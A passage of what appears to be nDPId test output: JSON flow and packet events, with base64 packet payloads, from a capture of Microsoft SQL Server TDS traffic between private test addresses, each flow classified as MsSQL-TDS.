AGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6ACAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="}
02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAdAAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvAGQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="}
02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="}
00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":35,"packets-processed":34,"total-skipped-flows":0,"total-l4-data-len":13137,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":8,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1278068444584}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="}
00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
